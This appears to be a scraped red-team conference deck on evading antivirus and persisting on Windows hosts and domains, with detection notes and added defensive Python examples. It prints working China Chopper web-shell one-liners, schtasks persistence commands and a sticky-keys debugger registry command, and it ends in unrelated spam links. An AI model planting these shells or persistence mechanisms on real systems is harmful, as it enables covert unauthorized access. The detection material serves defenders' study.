The Supporting Role of
Antivirus while Persisting
@ChrisTruncer
Christopher Truncer
Previous Systems Administrator turned Red Teamer
Red Team Lead at Mandiant
Florida State Seminole
Open Source Developer
@ChrisTruncer
What’s this talk about?
◉ How Stagers Work
◉ Case Study: Bypassing a Signature
◉ The Right Way to do Detection
◉ Persistence - lots of it! :)
◉ Old School and New School Techniques
◉ Persistence Detection
◉ Questions
Antivirus Evasion
Antivirus Evasion
◉ White hats and attackers alike need to evade
antivirus
◉ Evading to establish immediate C&C of
compromised system
◉ Also used to maintain access on a system/in a
network
Antivirus Evasion
◉ If required to use an executable, we’ll use a
stager
◉ Stager - Veil-Evasion or MSFVenom output
◉ Inject shellcode into memory
◉ Shellcode will download and inject a reflective dll
◉ A “loader” for your real malware
Stagers
◉ Stagers can be developed in any language that
can interact with the Windows functions
◉ It’s not hard to write a stager
○ Just four function calls
Stagers
◉ Allocate memory to store shellcode, and set the
proper memory permissions
◉ Copy shellcode into the allocated memory
◉ Create a thread to execute the shellcode
◉ Have code wait until thread is done executing
Stagers
◉ VirtualAlloc
◉ RtlMoveMemory
◉ CreateThread
◉ WaitForSingleObject
AV’s Approach to Catching Malware
Methods of Detection
◉ Signature Based
○ This is what Veil-Evasion targets
◉ Heuristics Based
◉ Crowd Sourced
○ Reputation Based
Veil’s Approach to Bypassing AV
Approaches to Bypassing AV
◉ Ghost code / net no-operation code
◉ Encrypted binaries
○ Hyperion
◉ Custom Code
Veil’s Approach
◉ Fight on-disk detection through different
techniques
○ Obfuscated code
○ Encrypted code
○ Non-standard languages for Windows binaries
■ Python, Ruby, Perl, etc.
○ Shellcode-less binaries
Veil’s Approach
◉ Languages within Veil-Evasion
○ Python
○ Perl
○ PowerShell
○ C#
○ C
○ Go
○ Ruby
Veil’s Approach
◉ Using a language that’s not C or C# made a large
difference
○ AV programs didn’t know or couldn’t properly inspect
non-standard languages
◉ Example:
○ C vs. Python
Simply changing the language the code is written in completely bypassed all signatures.
Veil Module
Veil Module
◉ Add a little complexity, so it isn’t just easily
obvious what is happening
◉ What about encrypting the code?
◉ What about making the tool brute-force its own
key?
Stallion
◉ Generate a random encryption key, that is
artificially constrained
○ JDUdmdkdueoLKJMsdfjkn#$%d + 1234567
◉ Test for a known string with decryption key
○ If it doesn’t match, it’s the wrong key
○ If it matches, decrypt the shellcode and inject it into memory
Signature Bypass
Signature Bypass
◉ After approximately one year, Veil had its first AV
signature
Signature Bypass
◉ I was excited to see if someone finally figured
Veil-Evasion out
○ It is open source…
◉ Previous attempts have turned out fairly
humorous
Persistence
Hosts vs. Networks
Persistence Purposes
◉ Persistence is commonly used for one of two
purposes:
○ Persisting on a host
○ Persisting in a network
◉ A lot of the techniques I will cover can facilitate
access for both purposes
Persisting Hosts
◉ When persisting a host, an attacker is looking for
ad-hoc, or programmatically defined access, to a
system
○ Attackers want this as close to on-demand as possible
◉ The efforts undertaken by an attacker are
directed to maintaining access to a specific host
Persisting Hosts
◉ What’s needed for persisting hosts?
○ Survive Reboots
■ Probably the most important concept
○ Have administrative rights on the system
○ Complement network-based persistence
Persisting Networks
◉ Network based persistence in two contexts
○ Used to maintain access into a network
■ Similar to host-based persistence, but its purpose isn’t
for access to host, but the network
○ Used to maintain access into different networks
■ Don’t want to be VLANed off in a VoIP network
Persisting Networks (continued)
◉ What other network-based persistence options are there?
○ Attackers can use persistence not only to maintain access to
a network, but also obtaining their required domain
permissions on-demand
○ Access likely facilitated through a host-based persistence
technique
Persisting Networks
Web Shells
◉ This seems so trivial and easy that you would think
no one would ever use it…
◉ …that’s not the case
○ China Chopper - APT17, APT19, APT22
○ ITSecShell, reDuh, ASPShell
○ Even commodity code
China Chopper
◉ Very tiny webshell, about 4 KB stored server side
◉ Developed in a variety of languages
○ CFM
○ ASP
○ PHP
○ Etc.
◉ A client application is used to interact with the
webshell
China Chopper Server Code
◉ ASP
○ <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>
◉ PHP
○ <?php @eval($_POST['password']);?>
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
China Chopper
◉ Really useful features in China Chopper
○ File Explorer
○ Upload/Download files
○ Mod file timestamp attributes
○ Database client - MSSQL, MySQL
○ Command shell
Web Shell Prevention & Detection
◉ Hunt/Sweep for known bad files
○ Hashes, or other file based indicators
◉ Allowlist the file types an upload feature may accept and
reject everything else
◉ Don’t allow your web server to execute files
uploaded from untrusted sources
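Added example (not from the deck): a Python sweep that walks a web root and flags script files either by a known-bad hash or by the pattern both China Chopper one-liners on the previous slides share, an evaluator fed straight from request input. The web root, its files and the (empty) hash set are constructed here; the regex is an assumption about what to look for and will miss shells that obfuscate the call, so treat it as a first pass over a server, not a blocklist.

```python
import hashlib
import os
import re
import tempfile

# SHA-256 digests of files already confirmed as shells; empty in this constructed example.
KNOWN_BAD_SHA256 = set()

# An evaluator/executor called directly on request input: eval(Request.Item[...]) in the
# ASP one-liner and @eval($_POST[...]) in the PHP one-liner both match.
EVAL_OF_REQUEST = re.compile(
    rb"\b(eval|assert|system|passthru|shell_exec|exec|popen|execute)\s*\(\s*@?"
    rb"(\$_(POST|GET|REQUEST|COOKIE)|Request(\.(Item|Form|QueryString))?)\b",
    re.IGNORECASE,
)
WEB_EXTENSIONS = {".php", ".phtml", ".asp", ".aspx", ".cfm", ".jsp"}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def classify(data: bytes):
    """Reason string if the content looks like a web shell, else None."""
    digest = sha256_hex(data)
    if digest in KNOWN_BAD_SHA256:
        return "known-bad hash " + digest[:12]
    if EVAL_OF_REQUEST.search(data):
        return "evaluates request input (%d bytes)" % len(data)
    return None


def sweep(root: str):
    """Walk a web root; sorted (relative path, reason) for every suspicious script file."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() not in WEB_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                reason = classify(f.read())
            if reason:
                hits.append((os.path.relpath(path, root).replace(os.sep, "/"), reason))
    return sorted(hits)


# Constructed web root: the page's two one-liners plus a benign page and an image.
SAMPLES = {
    "uploads/img.php": b"<?php @eval($_POST['password']);?>",
    "cmd.aspx": b'<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    "index.php": b"<?php echo htmlspecialchars($_GET['q']); ?>",
    "uploads/logo.png": b"\x89PNG\r\n not code",
}


def build_sample_tree() -> str:
    """Write SAMPLES into a temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, content in SAMPLES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(content)
    return root


if __name__ == "__main__":
    for rel, reason in sweep(build_sample_tree()):
        print(rel, "->", reason)
```

Hashes only catch what you have already seen, which is why the content check comes second: a one-line shell re-saved with a different variable name has a new hash but the same shape. Anything flagged still needs a human look, since a handful of legitimate admin scripts do the same thing.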
Magic Packet
◉ Or “how to access port 12345 with a packet to
port 443”
◉ The attacker’s problem:
○ Compromised a web server (port 80 and 443 are in use)
○ Firewall(s) prevent connection to any other port
○ Wants a TCP backdoor to be remotely accessible
■ Can’t be bothered to write a webshell
Magic Packet
◉ Run backdoor listening on port 12345
◉ Run malware “low” in the network stack
○ Check incoming TCP SYN packets
○ When a SYN packet is received with a specific signature,
change destination port from 443 to 12345
○ The Windows network stack then delivers the packet to port 12345
○ Malware alters the port in all subsequent packets for the
stream
[Diagram: a SYN to dport 443 carrying data=s3cr37 reaches the compromised system; the malware rewrites it to dport 12345 so the backdoor receives it, and rewrites the SYN/ACK from sport 12345 back to sport 443 before it leaves the host]
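Added example (a model, not the malware from the engagement): the port rewrite described on the previous slides in Python, with the trigger value, addresses and ports constructed for the example, plus the network-side check a defender can run on captured traffic, a SYN that carries data. exchange() replays the handshake from the diagram as seen by the Windows stack and as seen on the wire; an unrelated HTTPS client to port 443 passes through untouched.

```python
from dataclasses import dataclass, replace

MAGIC = b"s3cr37"        # trigger from the slide's diagram (constructed value)
FRONT_PORT = 443         # the only port the firewall allows in
BACKDOOR_PORT = 12345    # where the backdoor actually listens


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False
    ack: bool = False
    payload: bytes = b""


class MagicPortRewriter:
    """Models the component sitting below the TCP stack on the compromised host."""

    def __init__(self):
        self.flows = set()  # (remote ip, remote port) of the streams being redirected

    def inbound(self, pkt: Packet) -> Packet:
        """Every packet from the wire passes here before the Windows stack sees it."""
        if pkt.syn and not pkt.ack and pkt.dport == FRONT_PORT and pkt.payload == MAGIC:
            self.flows.add((pkt.src, pkt.sport))          # remember who knocked
        if pkt.dport == FRONT_PORT and (pkt.src, pkt.sport) in self.flows:
            return replace(pkt, dport=BACKDOOR_PORT)      # 443 -> 12345 for the whole stream
        return pkt

    def outbound(self, pkt: Packet) -> Packet:
        """Every reply leaving the stack passes here before it reaches the wire."""
        if pkt.sport == BACKDOOR_PORT and (pkt.dst, pkt.dport) in self.flows:
            return replace(pkt, sport=FRONT_PORT)         # 12345 -> 443 so the client sees 443
        return pkt


def exchange():
    """The handshake from the diagram: what the stack sees and what the wire sees."""
    mal = MagicPortRewriter()
    syn = Packet("10.0.0.5", 50000, "192.0.2.10", FRONT_PORT, syn=True, payload=MAGIC)
    syn_at_stack = mal.inbound(syn)                                        # dport is now 12345
    synack = Packet("192.0.2.10", syn_at_stack.dport, "10.0.0.5", 50000, syn=True, ack=True)
    synack_on_wire = mal.outbound(synack)                                  # sport is back to 443
    data = Packet("10.0.0.5", 50000, "192.0.2.10", FRONT_PORT, ack=True, payload=b"whoami\n")
    return syn_at_stack, synack_on_wire, mal.inbound(data)                 # data also lands on 12345


def syn_with_payload(packets):
    """Defender-side check on captured traffic: a bare SYN should carry no data."""
    return [p for p in packets if p.syn and not p.ack and p.payload]
```

On the host nothing listens on 443 for this traffic in the normal sense, which is why host-based telemetry sees a backdoor bound to 12345 and nothing unusual about 443; on the wire the giveaway is a SYN with a payload (only TCP Fast Open does that legitimately) followed by a "443" stream that never carries a TLS ClientHello.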
Magic Packet - Defenses
◉ This malware was installed via a custom
compiled executable
○ Application Whitelisting
○ Device Guard
Outlook
◉ Outlook rules can help provide a very unique
on-demand foothold onto a host
◉ Silent Break wrote a post on leveraging Outlook
rules to gain access to a user’s system
◉ Provides access immediately when Outlook
triggers the rule
Outlook
◉ Attacker creates an Outlook rule to execute a
binary when the “trigger” subject is received
◉ Attacker will sync the rule against the target
user’s account
◉ Send an e-mail with the trigger in the subject
◉ Get shell :)
Outlook - Additional Tweaks
◉ Have another rule auto-delete the incoming
e-mail to prevent user detection of the trigger
○ https://silentbreaksecurity.com/malicious-outlook-rules/
Outlook - Detection
◉ Honestly, not certain on the best means to detect
this at scale
◉ Primary IOC is to execute a program when
receiving an e-mail
○ I don’t know of any legitimate use cases for this
Persisting Hosts
Registry Hacks
◉ This is the 101 method for persistence that almost
everyone learns
◉ Extremely easy to set up, and can be installed
with a range of permissions
Registry Hacks
◉ These can be configured to run when the system
starts, or a user logs into the system
○ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
○ HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
◉ These methods are highly publicized and well
known.
◉ Defensive tools look for these
Registry Hacks - Takeaway
◉ These can be good for maintaining initial access,
but not for long term use
◉ SOCs - you want to have the ability to detect
these
Startup Folder
◉ Your system will execute files in the startup
folder
○ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
Scheduled Tasks
◉ Scheduled tasks are an easy way for a user of
any level to persist on a system
◉ With the proper permissions, you can schedule a
task up to the SYSTEM level
◉ This is Microsoft’s recommendation/alternative
to using “at” jobs
Scheduled Tasks
◉ Scheduled tasks can be created from the
command line with schtasks.exe or the GUI
◉ Tasks can run at startup, when a user logs into
the system, after the system has been idle, etc.
◉ Tasks can run binaries, PowerShell one-liners,
and more
Scheduled Tasks
◉ schtasks /create /tn SysUpdate /sc onidle /i 15 /tr c:\users\chris\downloads\safe.exe
◉ schtasks /create /tn WinUpdate /sc onstart /ru System /tr c:\totallylegit.exe /s winsqldbsystem
Scheduled Tasks - Detection
◉ Obtain a baseline of the scheduled tasks set to
run on your systems
○ schtasks /query
○ Task scheduler
○ Etc.
◉ Audit systems and identify deviations from your
baseline
Service Manipulation
◉ Services usually run with SYSTEM level
permissions, so can be juicy targets for attackers
◉ Easy way to install service based persistence?
Check service binary write permissions!
Service Manipulation
◉ Now that you found services that can be
modified, you just need a service binary.
○ Veil-Evasion, PowerUp, custom code
◉ Save the original service binary
◉ Bounce the box (or service) if required
Sticky Keys
◉ With administrative access to a machine, you can
easily set up sticky keys
○ Back up the original sethc.exe
○ Copy cmd.exe to C:\Windows\System32\sethc.exe
○ Reboot, and hit shift five times
Sticky Keys - Another Method
◉ Set cmd.exe as the debugger for sethc.exe
◉ REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
Sticky Keys - Another Method
◉ Main problem - doesn’t require authentication
◉ If using Sticky Keys, ensure it’s calling back to a
location you control, vs. opening up the system
for everyone
Sticky Keys - Detection
◉ Compare known good sethc.exe binary hash with
systems’ current sethc.exe binary
◉ Ensure no registry key is added defining a
debugger for sethc.exe
New School Persistence Techniques
DLL Search Order Hijack
◉ DLL search order hijacking exploits how windows
searches for DLLs when loading an executable
◉ Specifically, it abuses the fact that Windows searches
the folder the executable was launched from for a DLL
before it searches the system directories
DLL Search Order Hijack
◉ Sample in CAPEC
○ If you drop ntshrui.dll within C:\Windows and run explorer.exe,
you can get the DLL within C:\Windows to be executed
◉ This exploits the order in which the dll is
searched for on a Windows system
DLL Search Order Hijack
◉ Attackers create malicious DLLs that exploit this
search order to get their DLL to run on a system
◉ Since it’s every time the application runs, it can be
used as a persistence technique
◉ PowerUp can be used to find these opportunities
DLL Search Order Hijack
◉ Used by the following actors:
○ APT 1, APT 8, APT 17, APT 19, APT 22, APT 26
◉ Used by the following malware:
○ AMISHARP, GH0ST, HOMEUNIX, POISON IVY, VIPER
Legitimate Scheduled Tasks
◉ Easy to identify
scheduled tasks
named “Evil task”
◉ First we must look at
how investigators
detect malicious
scheduled tasks
Legitimate Scheduled Tasks
◉ Stacking tasks across
multiple systems to
determine anomalous
tasks
◉ Parse task scheduler
log (SchedLgU.txt)
Legitimate Scheduled Tasks
◉ What if we modify
existing legit
scheduled tasks?
○ Specifically tasks that are
not required for Windows
functionality
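Added example (not from the deck): Python that stacks `schtasks /query /v /fo CSV` output collected from several hosts, the approach the two previous slides describe, and that catches both kinds of task mentioned above, the one-off "SysUpdate" task and a legitimate Windows task whose command was edited on a single host. The CSV sample, host names and task rows are constructed for the example; the column names are the ones schtasks emits, and the repeated header lines are what you get when per-host output is concatenated.

```python
import csv
import io
from collections import defaultdict

# Constructed "schtasks /query /v /fo CSV" output from three hosts, concatenated.
SAMPLE = r'''"HostName","TaskName","Author","Task To Run","Run As User","Schedule Type"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM","Weekly"
"WS01","\GoogleUpdateTaskMachineUA","","C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua","SYSTEM","Daily"
"HostName","TaskName","Author","Task To Run","Run As User","Schedule Type"
"WS02","\Microsoft\Windows\Defrag\ScheduledDefrag","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM","Weekly"
"WS02","\GoogleUpdateTaskMachineUA","","C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua","SYSTEM","Daily"
"WS02","\SysUpdate","WS02\chris","c:\users\chris\downloads\safe.exe","chris","On idle"
"HostName","TaskName","Author","Task To Run","Run As User","Schedule Type"
"WS03","\Microsoft\Windows\Defrag\ScheduledDefrag","Microsoft Corporation","C:\Windows\Temp\defrag.exe -c","SYSTEM","Weekly"
"WS03","\GoogleUpdateTaskMachineUA","","C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua","SYSTEM","Daily"
'''


def parse_schtasks_csv(text: str):
    """Rows as dicts, dropping the header lines repeated by concatenating per-host output."""
    return [r for r in csv.DictReader(io.StringIO(text)) if r["TaskName"] != "TaskName"]


def stack(rows, fields=("TaskName", "Task To Run")):
    """Map each distinct (task name, command) to the set of hosts that carry it."""
    hosts = defaultdict(set)
    for r in rows:
        hosts[tuple(r[f] for f in fields)].add(r["HostName"])
    return hosts


def outliers(rows, max_hosts=1):
    """(task name, command) pairs present on at most max_hosts hosts: the ones to look at."""
    return sorted((k, sorted(h)) for k, h in stack(rows).items() if len(h) <= max_hosts)


def modified_tasks(rows):
    """Task names whose command differs between hosts: a legit task someone edited."""
    commands = defaultdict(dict)
    for (name, cmd), hosts in stack(rows).items():
        commands[name][cmd] = sorted(hosts)
    return {name: cmds for name, cmds in commands.items() if len(cmds) > 1}


def diff_baseline(rows, baseline):
    """Everything not in a known-good set of (task name, command, run-as user)."""
    seen = {(r["TaskName"], r["Task To Run"], r["Run As User"]) for r in rows}
    return sorted(seen - set(baseline))


if __name__ == "__main__":
    rows = parse_schtasks_csv(SAMPLE)
    for (name, cmd), hosts in outliers(rows):
        print("rare:", name, "->", cmd, "on", hosts)
    for name, cmds in modified_tasks(rows).items():
        print("inconsistent command for", name, cmds)
```

Stacking on the name alone would miss the WS03 case entirely, since ScheduledDefrag exists everywhere; stacking on the command (and, in practice, on the run-as user and the binary's hash) is what surfaces a legitimate task that has been repointed at an attacker's binary.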
Unquoted Service Paths
◉ Unquoted service paths abuse the way Windows
(CreateProcess) parses a binary path that contains spaces
but is not quoted: every space is a possible end of the
executable name
○ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe
Unquoted Service Paths
◉ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe
○ C:\Program.exe
○ C:\Program Files(x86)\Steam\Steam.exe
○ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe
◉ Three opportunities
Unquoted Service Paths
◉ If we have write access to any of the paths that
Windows looks for, we can hijack the service
○ Just need a service binary
◉ Drop it into any of the paths on the previous slide,
and restart the service
○ Might need to wait for a reboot
Unquoted Service Paths - Prevention
◉ Check service binaries on your images and
determine if any are using unquoted service
paths.
◉ Make sure the directories on those paths aren’t writable
by non-admins.
◉ PowerUp can find these as well
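Added example (not PowerUp's code): Python that derives, for an unquoted service path, every location CreateProcess tries before it reaches the real binary, generalizing the three-candidate walkthrough above to any path and to paths that carry arguments, and that lists the directories whose ACLs need checking. The service rows are constructed in the shape Win32_Service reports them; whether a candidate is actually exploitable depends on a non-admin having write access to the listed directory, which this example does not test.

```python
import ntpath

# Constructed (Name, PathName, StartName) rows in the shape Win32_Service reports them.
SERVICES = [
    ("SteamGaming", r"C:\Program Files(x86)\Steam\Steam Gaming\steam.exe", "LocalSystem"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "LocalSystem"),
    ("VendorAgent", r'"C:\Program Files\Vendor\Agent Service\agent.exe" -svc', "LocalSystem"),
    ("BackupTool", r"C:\Backup Tool\bkp.exe -run", r"NT AUTHORITY\LocalService"),
]


def is_unquoted_with_spaces(pathname: str) -> bool:
    p = pathname.strip()
    return not p.startswith('"') and " " in p


def hijack_candidates(pathname: str):
    """Every path CreateProcess tries, in order, before it reaches the real binary."""
    if not is_unquoted_with_spaces(pathname):
        return []
    tokens = pathname.strip().split(" ")
    tried = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if ntpath.splitext(prefix)[1] == "":      # no extension: Windows appends .exe
            prefix += ".exe"
        tried.append(prefix)
        if tokens[i - 1].lower().endswith(".exe"):  # reached the binary; the rest is arguments
            break
    return tried


def dirs_to_check(pathname: str):
    """Directories an attacker would need write access to, in the order they are tried."""
    return list(dict.fromkeys(ntpath.dirname(c) for c in hijack_candidates(pathname)))


def audit(services):
    """Services worth fixing: unquoted path with spaces, with where a planted binary would land."""
    return [(name, user, hijack_candidates(path))
            for name, path, user in services if is_unquoted_with_spaces(path)]


if __name__ == "__main__":
    for name, user, candidates in audit(SERVICES):
        print(name, "runs as", user)
        for c in candidates:
            print("   ", c)
```

Feed it the output of `wmic service get name,pathname,startname` or Get-CimInstance Win32_Service from a golden image; the fix for every hit is the same, quote the ImagePath, and the check that decides whether a hit is urgent is whether any directory in dirs_to_check() grants write to Users or Authenticated Users.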
WMI Requirements
◉ Event Filter
◉ Event Consumer
◉ Filter/Consumer Binding
WMI Requirements - Event Filter
◉ The WMI query that fires upon an event occurring
○ Usually, an event class derived from
__InstanceModificationEvent, __InstanceCreationEvent, or
__InstanceDeletionEvent
WMI Requirements - Event Consumer
◉ There are five different event consumers
○ The most interesting one is “CommandLineEventConsumer”
◉ These “consume” or act on events that occur
WMI Requirements - Filter/Consumer Binding
◉ This (__FilterToConsumerBinding) associates a WMI Event
Filter with the Event Consumer; all three objects live in the
root\subscription namespace, which is where to enumerate them
WMI - Persistence
◉ PowerSploit’s persistence module for WMI
○ Automates the creation process
○ Will create a permanent WMI event subscription
PowerShell Profiles
◉ Whenever PowerShell starts (unless launched with
-NoProfile), it executes the code in the profile
◉ Create profile code here:
○ C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
PowerShell Profiles
◉ Use standard persistence mechanism to execute
PowerShell silently
○ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden
○ It’s a legit exe!
PowerShell Profiles
◉ Example in profile.ps1:
○ iex("write-host 'hello world'")
Security Support Provider
◉ A Security Support Provider (SSP) - a security
package
○ An extension used to perform authentication during
client/server exchange
◉ An Authentication Package (AP)
○ Extends interactive login authentication
○ Example: RSA tokens
Security Support Provider
◉ SSP/AP
○ Can serve tasks of SSPs and APs - loaded into lsass at boot
○ Example: Kerberos and msv1_0 (NTLM)
Security Support Provider
◉ Install your own SSP that is loaded into lsass.exe
◉ Can develop your own SSP DLL
◉ Use Persistence module in PowerSploit to install
your malicious SSP
Security Support Provider
◉ Benjamin Delpy (@gentilkiwi) added SSP functionality
into mimilib.dll
○ Once installed and loaded into lsass.exe, it captures
plaintext passwords
Excel Magic
◉ Malicious macro executes backdoor
◉ How can you ensure persistence?
○ Most users will run Excel once a day
○ You can use any “old school” techniques to spawn Excel
○ Lower the macro security setting so the macro runs without prompting the user
Excel Magic
◉ Registry modification that opens specific
Workbook upon starting Excel
○ HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\Trusted Locations
○ Just add the location
Additional Persistence Opportunities
Golden Tickets
◉ Technique developed by Benjamin Delpy (mimikatz) and
documented in depth by Sean Metcalf
◉ Forges a “golden” kerberos ticket which can be
good for 10 years!
◉ Golden tickets provide on-demand domain
privilege “upgrades” for any group within the
domain
Golden Tickets
◉ Only need four pieces of information
○ Domain SID
○ Name of the domain
○ User you want to create a ticket for
○ Krbtgt account hash
◉ You can build your ticket at home, offline
Golden Ticket Takeaways
◉ If impersonating an account, tickets are still valid
even if password changes
◉ Valid for as long as you specify (10 year default)
◉ Domain trusts
○ Child domains can compromise the parent
◉ Only way to invalidate them is to reset the krbtgt account password (which changes its hash)… twice…
◉ Or rebuild from bare metal
Account Checkout - Case Study
◉ Client had account checkout system for domain
administrator accounts
◉ Only two users with access to checkout system
◉ System requires 2FA
◉ DA access is lost if user changes their
password/pin/token
◉ Users can see checked out accounts
Account Checkout - Case Study
◉ Persist domain administrator without getting
caught
○ Can’t continuously check out accounts
◉ Password vault permissions were managed
through Active Directory groups
○ Tons of them
Account Checkout - Case Study
◉ Copy group memberships to a compromised
user account
○ User doesn’t use the Password Vault
■ All changes were documented
◉ This gave us all the permissions we needed
without needing access to their Password Vault
Conclusions
Conclusions
◉ Persistence will remain rampant
◉ Always new and creative ways to maintain
persistence
◉ Understanding persistence techniques is critical
to detecting attacker access
Thanks!
ANY QUESTIONS?
@ChrisTruncer
Christopher.Truncer@mandiant.com

The Future of Security and Productivity in Our Newly Remote WorldThe Future of Security and Productivity in Our Newly Remote World
The Future of Security and Productivity in Our Newly Remote World
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
FLISOL 2015 - Criptografia é importante! Aprenda meios simples de proteger ar...
FLISOL 2015 - Criptografia é importante! Aprenda meios simples de proteger ar...FLISOL 2015 - Criptografia é importante! Aprenda meios simples de proteger ar...
FLISOL 2015 - Criptografia é importante! Aprenda meios simples de proteger ar...
 
The Ultimate Android Security Checklist (Codemotion Tel-Aviv, 2014)
The Ultimate Android Security Checklist (Codemotion Tel-Aviv, 2014)The Ultimate Android Security Checklist (Codemotion Tel-Aviv, 2014)
The Ultimate Android Security Checklist (Codemotion Tel-Aviv, 2014)
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
So you want to be a security expert
So you want to be a security expertSo you want to be a security expert
So you want to be a security expert
 
First adventure within a shell - Andrea Telatin at Quadram Institute
First adventure within a shell - Andrea Telatin at Quadram InstituteFirst adventure within a shell - Andrea Telatin at Quadram Institute
First adventure within a shell - Andrea Telatin at Quadram Institute
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys Admins
 

Dernier

Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Sonam Pathan
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxeditsforyah
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作ys8omjxb
 
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一z xss
 
Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New OrleansElevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New Orleanscorenetworkseo
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa494f574xmv
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predieusebiomeyer
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书rnrncn29
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)Christopher H Felton
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Sonam Pathan
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012rehmti665
 
Intellectual property rightsand its types.pptx
Intellectual property rightsand its types.pptxIntellectual property rightsand its types.pptx
Intellectual property rightsand its types.pptxBipin Adhikari
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxDyna Gilbert
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Excelmac1
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Dana Luther
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书rnrncn29
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
